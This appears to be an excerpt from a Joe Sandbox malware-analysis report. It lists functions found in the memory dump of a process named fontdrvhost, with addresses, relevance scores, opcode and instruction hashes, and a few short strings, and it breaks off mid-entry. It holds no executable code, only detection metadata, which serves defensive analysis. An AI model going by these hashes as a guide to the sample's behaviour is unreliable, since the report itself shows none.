                                • Opcode ID: 8d185cc892564757afb77e0fdcc3d839121225a62aa36c5ae20046dc700f9d22
                                • Instruction ID: 6f42ef229fe498974000d9b447d64af9ef7b4955b2ae8b16ba34b312a5121aeb
                                • Opcode Fuzzy Hash: 8d185cc892564757afb77e0fdcc3d839121225a62aa36c5ae20046dc700f9d22
                                • Instruction Fuzzy Hash: AF42C770E1962D8FDBA8DF68C894BEDB7B1FF58301F5041A9D04EA7295DA346A81CF40
                                Function 00007FFD9B8906E0 Relevance: 6.5, Strings: 5, Instructions: 238COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: =N_^$?N_I$N_^X$N_^f$N_^g
                                • API String ID: 0-3255808656
                                • Opcode ID: b2cca0d8b179526f4e39b15ba8be7b72dd82f07c0b5724a6be58b47f5d5c94c0
                                • Instruction ID: 14c8f7ac70ab85fd34a62bcfa2a4f215e84c484b49bdcb6d86decd8a89394b7f
                                • Opcode Fuzzy Hash: b2cca0d8b179526f4e39b15ba8be7b72dd82f07c0b5724a6be58b47f5d5c94c0
                                • Instruction Fuzzy Hash: 2D618C63B0F6895BEB2697DC6CA51E87FA1FF49760B4502F7E058C70E7EC156A028381
                                Function 00007FFD9B890F98 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: &
                                • API String ID: 0-2822232526
                                • Opcode ID: cd321057d251f09bcda9b15b6dbe99b4e2149a78e4270053a29c9e5ab1dc57a3
                                • Instruction ID: bcd4db4b620b57a27a799bda880e04e1d4ae6f58a087b656d34968166f594960
                                • Opcode Fuzzy Hash: cd321057d251f09bcda9b15b6dbe99b4e2149a78e4270053a29c9e5ab1dc57a3
                                • Instruction Fuzzy Hash: 2CD13B71E1965D8FDBACDB58D8A4BE8BBB1FF58300F4441B9D00DE32A6DA356981CB01
                                Function 00007FFD9B8904F8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?N_^
                                • API String ID: 0-1123592777
                                • Opcode ID: f4031201e5a582e0a2d396e6bfbb3b2db755ad948456b1cf2f40b264d5d0c7e3
                                • Instruction ID: f81a0918c252fd9d7bca808ca4fb4401466ed33aac772872a09b32639ecbfd15
                                • Opcode Fuzzy Hash: f4031201e5a582e0a2d396e6bfbb3b2db755ad948456b1cf2f40b264d5d0c7e3
                                • Instruction Fuzzy Hash: 7401D231A0D25E9FDB56EFA898A15F67BA0EF05308F0401BAE05CC6093EA68A551C781
                                Function 00007FFD9B897C89 Relevance: .3, Instructions: 334COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a8c0727e9adfec975ab7b4ecb59626ce5e8b4ab13a6ac585498d3126984864d4
                                • Instruction ID: d6dabe08745b9853c785e54efff18451fcc9ee6bc9771dcc4f684c83e4bd9218
                                • Opcode Fuzzy Hash: a8c0727e9adfec975ab7b4ecb59626ce5e8b4ab13a6ac585498d3126984864d4
                                • Instruction Fuzzy Hash: 70C18D74A0A91E8FEB64DBA884917ED7BF1FF98340F51417AD00DD32A6CB386946CB40
                                Function 00007FFD9B893239 Relevance: .3, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 497b12d2225fa7b57419040f9df7f97e0d91b771bf4ec36b9262583d3ec762eb
                                • Instruction ID: 57221d883088d0131891cd9f7684e57bb9badaa9d05b3781d3ebaaa1c11cce86
                                • Opcode Fuzzy Hash: 497b12d2225fa7b57419040f9df7f97e0d91b771bf4ec36b9262583d3ec762eb
                                • Instruction Fuzzy Hash: 60B14D71E1965D8FDBACDB58D8A4BA8B7A1FF58300F0441B9D00DE72E6DE346981CB01
                                Function 00007FFD9B8905D8 Relevance: .3, Instructions: 281COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4fe939921ff97e3827f13db6caea1c1ca0eb48a5c89fc4e6d4d6d7083a7c33ed
                                • Instruction ID: 869d75b574d930472c77c17d6a5dcef10c0d790432f922fe92d30e6248c682a3
                                • Opcode Fuzzy Hash: 4fe939921ff97e3827f13db6caea1c1ca0eb48a5c89fc4e6d4d6d7083a7c33ed
                                • Instruction Fuzzy Hash: 1781E231B1DA494BDF68EF5C88615B97BE2FF9C300B15457EE45EC3292DE34A9028780
                                Function 00007FFD9B896163 Relevance: .2, Instructions: 200COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0f77e98aeef0cb21d4ab9ad9e36502dd4d5a74634521f07d2c3f8299a7e0934
                                • Instruction ID: 7a2d073a3fb9c1acd399327ce18878a39b0f41b220a296b98d08c306849be6bc
                                • Opcode Fuzzy Hash: c0f77e98aeef0cb21d4ab9ad9e36502dd4d5a74634521f07d2c3f8299a7e0934
                                • Instruction Fuzzy Hash: CC71A670E1461D8FDB94EFA8D895BECBBB1FF58300F5041AAD01DE3295DE3469818B41
                                Function 00007FFD9B89129D Relevance: .2, Instructions: 185COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 03f0ff4c531cdcb0880dc69581979b72529dc57271e5ce920c8c9b00b4da421a
                                • Instruction ID: 1247d787e82a0bf828cb4767e26e360577e965222b75a99e2f71e521b4f43252
                                • Opcode Fuzzy Hash: 03f0ff4c531cdcb0880dc69581979b72529dc57271e5ce920c8c9b00b4da421a
                                • Instruction Fuzzy Hash: C951DF30B1CA4A4FDB58EF5888645BA7BE2FF98304B15417EE45EC7292DE34E8028781
                                Function 00007FFD9B892CD9 Relevance: .2, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6a42254971db5bce3b6ffda56f20526509ac9759be393590ac27f9256f9ef8c5
                                • Instruction ID: cf7d3fd8a78943d921424e1bd009571ad9c05c7c0be30650b97abe5692912e2f
                                • Opcode Fuzzy Hash: 6a42254971db5bce3b6ffda56f20526509ac9759be393590ac27f9256f9ef8c5
                                • Instruction Fuzzy Hash: E6513071A1995D8FDF98EF98D865AECBBB1FF59300F41016AE00DE7292CA64A941CB40
                                Function 00007FFD9B89238D Relevance: .2, Instructions: 158COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 029ebadd71077094fd9f9f1df1e6f17a60ff254428c064bcc2331d1c2c418012
                                • Instruction ID: 9de9bb09dc818fe9394bb3fd28d4f5d5b54727c63daaf68e689d009a0a704700
                                • Opcode Fuzzy Hash: 029ebadd71077094fd9f9f1df1e6f17a60ff254428c064bcc2331d1c2c418012
                                • Instruction Fuzzy Hash: 0851D361A0E69D4FEBA6DBA88C657A87FA0EF59300F0540F7D08CC71E7DE246A85C741
                                Function 00007FFD9B891828 Relevance: .1, Instructions: 116COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c65adbb096a09b377d24285662f002779b1e0cfdf9c957a8f4789634a8ccfe5f
                                • Instruction ID: db19cc34c88909f789a19a9b7b91aab49195fa7926c1dd84f6bcf130e09ce503
                                • Opcode Fuzzy Hash: c65adbb096a09b377d24285662f002779b1e0cfdf9c957a8f4789634a8ccfe5f
                                • Instruction Fuzzy Hash: 42319231E1E61E9AEB74BB9084217F8B6A1FF4A700F410279D05EA21E1CF396A45DA80
                                Function 00007FFD9B891CA9 Relevance: .1, Instructions: 109COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0c13f12d82b8e86c3d2dacf075f1061e38c383c114ddbf000de0ca116b10239d
                                • Instruction ID: cf497271cf6eb1dd01ff9ea11ac21184302b82036788e92e266210a3b66e653f
                                • Opcode Fuzzy Hash: 0c13f12d82b8e86c3d2dacf075f1061e38c383c114ddbf000de0ca116b10239d
                                • Instruction Fuzzy Hash: 84415F31E09A1D9FDB54EB98C8A4AEDBBF1FF59301F4100AAD409E72A1DB399945CB40
                                Function 00007FFD9B895FDD Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7acc43e77254cb7cb3cbbe04cfe9c475cbc2e95c379c6d99f583c197e4551b0
                                • Instruction ID: 447a147e8eca9c8065f385fc5e61b96828d995ea955603b6985e41f5825cae3e
                                • Opcode Fuzzy Hash: d7acc43e77254cb7cb3cbbe04cfe9c475cbc2e95c379c6d99f583c197e4551b0
                                • Instruction Fuzzy Hash: 28414C70E14A4D8FEB54EF98D865AEDBBF1FF48310F010176E418E3296DA3469418B91
                                Function 00007FFD9B8964E9 Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0fe34fb5ceb0e305edab362c0c3d625700222a047cd0c959a8dda3d5cf8917bd
                                • Instruction ID: 8faf8d8ffa4a88d0fc26815155a220bd65e94baa7cd1fb49b3406a5300d99eb2
                                • Opcode Fuzzy Hash: 0fe34fb5ceb0e305edab362c0c3d625700222a047cd0c959a8dda3d5cf8917bd
                                • Instruction Fuzzy Hash: 1E417C70D096498FEB55DFA4C864AEDBBF1FF49300F1101BAD009D72AACB399981CB41
                                Function 00007FFD9B8983F5 Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ed9d35e242e4cb91d7b5482fe3c7cdcb13b7372dc7b6dbaddb3b12cba799e24
                                • Instruction ID: 4a07fb8382b768ba6237b59f8829aa9ba1cecb6d57a9c2ed6543046053d059a3
                                • Opcode Fuzzy Hash: 9ed9d35e242e4cb91d7b5482fe3c7cdcb13b7372dc7b6dbaddb3b12cba799e24
                                • Instruction Fuzzy Hash: FF314A31E0961E8FDB58DFA4D4646FEBBB1EF58300F11017AE019A32D1CA385A41CB90
                                Function 00007FFD9B895A29 Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 73a63ce6175d905e69dd8ca6de03b4072f37bb9d78bc9e1c5b8f6cc4f52b0580
                                • Instruction ID: 7213d585bfc4eeb08895538f63bb5139d695d715ee171c8dbcbc22edc556f2ca
                                • Opcode Fuzzy Hash: 73a63ce6175d905e69dd8ca6de03b4072f37bb9d78bc9e1c5b8f6cc4f52b0580
                                • Instruction Fuzzy Hash: 3D314D71E09A0D8FDF98EF9CD495AADB7F1FF99310F10016AE41DD7295CA35A8428B40
                                Function 00007FFD9B895931 Relevance: .1, Instructions: 93COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 641946f16a7b3deb8fc21a517114300b4b3966abc4b9a27afb953abdfc849386
                                • Instruction ID: 0e555f493d9d797c700c0bc0a7293de232bc86775fe2fa901b80d6e6e22959a9
                                • Opcode Fuzzy Hash: 641946f16a7b3deb8fc21a517114300b4b3966abc4b9a27afb953abdfc849386
                                • Instruction Fuzzy Hash: B031042090F7CE1FE7A69BB4C864AE87FB1DF4A310F0904EED089D7197C9189945C712
                                Function 00007FFD9B892BC9 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 26618ae5b242d8d74157ccee766ddd83fa28e9363d9369510809beb495f6e2a4
                                • Instruction ID: 66e3adcf0de6cc9aafbaeab7b2f35e5bffb114c10f4ed7a75616bc546b156458
                                • Opcode Fuzzy Hash: 26618ae5b242d8d74157ccee766ddd83fa28e9363d9369510809beb495f6e2a4
                                • Instruction Fuzzy Hash: AA310671E0A65D8FDB59DFA8D8506EDBBB1FF59300F10056AE019E3291DB38A941CB81
                                Function 00007FFD9B89186A Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 92d2dc6394a82665ea0fbf56d1c43fbabb40c8bc8fd551d87ca36f0f0d6fc856
                                • Instruction ID: 562591556a54ec7001ce8ba259cf442e61daf040747a8a2d11776369b527ace2
                                • Opcode Fuzzy Hash: 92d2dc6394a82665ea0fbf56d1c43fbabb40c8bc8fd551d87ca36f0f0d6fc856
                                • Instruction Fuzzy Hash: 93110D31E1A52D8EDB68EB60D4617FCB671FF06701F8114B9D04EA6192CE356A44DB40
                                Function 00007FFD9B890C05 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 92ce8955bcc542d98ab5bb8b12fe12327bec283ff203c2c7b88db82b30428942
                                • Instruction ID: 4b73fa44641133ae920d4acd5372523be7110f37dff1cae1d1de0502f2209aaf
                                • Opcode Fuzzy Hash: 92ce8955bcc542d98ab5bb8b12fe12327bec283ff203c2c7b88db82b30428942
                                • Instruction Fuzzy Hash: 55112331F1590E8ECF68EB94C8247EDB7A1FF49300F80027AD019EB1A5CE3469458B80
                                Function 00007FFD9B8908B1 Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4311021a779d052cc75cecf8f02a282c76a319e316c78354d7980dae8289f354
                                • Instruction ID: 5d19f5dcc1fe2e40586fafbdfebaae3fefc98d384f43d10272ef15aa14e5d0ec
                                • Opcode Fuzzy Hash: 4311021a779d052cc75cecf8f02a282c76a319e316c78354d7980dae8289f354
                                • Instruction Fuzzy Hash: EFF02831A0964D8FD794EB6888995EC7FF0EF48300F8101FAD008D61A2DF3916458741
                                Function 00007FFD9B891F5D Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 11c64b740314d6fe7d2b81a47c9fbb6732ea66fe7e4e8695a6a147c17dd6a19c
                                • Instruction ID: 02dfe0b0ddce01c828f1c8b7fd864dc9f9ab60e10731d8cfe7f40529859888ac
                                • Opcode Fuzzy Hash: 11c64b740314d6fe7d2b81a47c9fbb6732ea66fe7e4e8695a6a147c17dd6a19c
                                • Instruction Fuzzy Hash: A7F02831A0E64D5FDB15EB6888A56ECBFE0EF44200F4101F6D418C71E3EB286946C341
                                Function 00007FFD9B891241 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a9f5de71d01e310d25de19f42e5ee6523df042c258de0c6b1d5f996b249653be
                                • Instruction ID: 683c7e45f6f642c667c76ad803354b27e57d7bdbe11b3004d70b4304ad76e78f
                                • Opcode Fuzzy Hash: a9f5de71d01e310d25de19f42e5ee6523df042c258de0c6b1d5f996b249653be
                                • Instruction Fuzzy Hash: D8F0BE3050E64D8FCB66EF54C8556E93FA0FF5A304F0501AAE41CC7192CB7ADA65CB81
                                Function 00007FFD9B898399 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 500118512eb54cf92b67c96bc0d766dcbf6e2a17216721d4abec9971268ff83f
                                • Instruction ID: 4048d96800965dfb7060e78b7be9f0d8d69aafa579e19a1f6fbbc2c03cad8fd4
                                • Opcode Fuzzy Hash: 500118512eb54cf92b67c96bc0d766dcbf6e2a17216721d4abec9971268ff83f
                                • Instruction Fuzzy Hash: 21F03C3191D68E8FDB51EB6888686ED7FF0FF1A304F0505ABD458D70A2DB345544CB51
                                Function 00007FFD9B890528 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ae5eadda36293c1844d6bf955b0813ebf6c4e0d205ad985bb9f61d872076c60
                                • Instruction ID: c73a1cfb75593f64e3e0008c71f261493adb5a5bc827a0156a1bef8181961530
                                • Opcode Fuzzy Hash: 5ae5eadda36293c1844d6bf955b0813ebf6c4e0d205ad985bb9f61d872076c60
                                • Instruction Fuzzy Hash: 84F05E3050960E8FDB55EF9494116E577A0FF59304F000176E41CD2195CA35A660C781
                                Function 00007FFD9B8981E0 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 885604a77612b4007665538a6f7475fabccb69192ee82b013977f59083f09ceb
                                • Instruction ID: e2ec2e70e633c6ae88e18efbee7d7a10bc5649352f1e22dd7151f5da005ff06a
                                • Opcode Fuzzy Hash: 885604a77612b4007665538a6f7475fabccb69192ee82b013977f59083f09ceb
                                • Instruction Fuzzy Hash: 31E06832A49D0D8BCF609F98AC102843BB1FB4D304F01026DE04CC3180D3355E52C300
                                Function 00007FFD9B89685C Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eb421aba41ecdfd5ea69e883e024c37e4698630aab55df376e19af45b9b23214
                                • Instruction ID: 716a5aa4a74f656992352075b491c820e1c1d6a9f034f43921e73d89af15dad2
                                • Opcode Fuzzy Hash: eb421aba41ecdfd5ea69e883e024c37e4698630aab55df376e19af45b9b23214
                                • Instruction Fuzzy Hash: CFE06872A09A0C4BDB509F9CAC6028837A0FB4C308F010269D44CD7180D3215544C301
                                Function 00007FFD9B891F15 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2f7d79206b12b07de61fd83f9da4de32b370e39b841b084be9c66662cce74ff9
                                • Instruction ID: 5dc29335e76615ef497502ba6ce31a1219a49da787af1f3546836c0c06e8d05a
                                • Opcode Fuzzy Hash: 2f7d79206b12b07de61fd83f9da4de32b370e39b841b084be9c66662cce74ff9
                                • Instruction Fuzzy Hash: DAE0923185F68E5FDB266F6089661E97F60FF05310F0616FBD058861D3DB6C9628C741
                                Function 00007FFD9B891C19 Relevance: .0, Instructions: 28COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b1f98a806bba9975e56d2760c8cbbb1c488bb2ae63c72e8e6b2c22bed4af81a9
                                • Instruction ID: 8b27181e0ccf9da73061104166d19654a517ccd7793feb9473d6d962f14127ea
                                • Opcode Fuzzy Hash: b1f98a806bba9975e56d2760c8cbbb1c488bb2ae63c72e8e6b2c22bed4af81a9
                                • Instruction Fuzzy Hash: 24F0E53194F38E4FDB666B6048611D97F70FF06600F0A06BAD068C61E3DB6CD658C342
                                Function 00007FFD9B892536 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bfb220e1b457fb724ba4ba37278052fea1cc8b2eab7e370d4e87bcd651b87e29
                                • Instruction ID: a2d6af88866945c820f29bcae167a795dc0ab92fc8ad27521d56e405cc7c024d
                                • Opcode Fuzzy Hash: bfb220e1b457fb724ba4ba37278052fea1cc8b2eab7e370d4e87bcd651b87e29
                                • Instruction Fuzzy Hash: 6DF01270A0485E4FDFA8EF18C894BA9B3F1FB58340F1086E6940DE3255DA30AEC58F80
                                Function 00007FFD9B890530 Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction ID: f30041032725aa9d0cdc4c1f37f2548c3d31e79fd394116e7dc55691a201d6d8
                                • Opcode Fuzzy Hash: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction Fuzzy Hash: 57E04F3050960ECFDFA4FF58C4506A67BA1FF58344F100539E41CD2190CB35E6A0CB80
                                Function 00007FFD9B890C65 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a54b59529ed083488a45c38b10bf54daad0eab8b47dc10777a560c8594da284a
                                • Instruction ID: 2e3a4e606b7cf8193bcb50d1685a8dddc49bfd14eeba6d52536beba15c478ef4
                                • Opcode Fuzzy Hash: a54b59529ed083488a45c38b10bf54daad0eab8b47dc10777a560c8594da284a
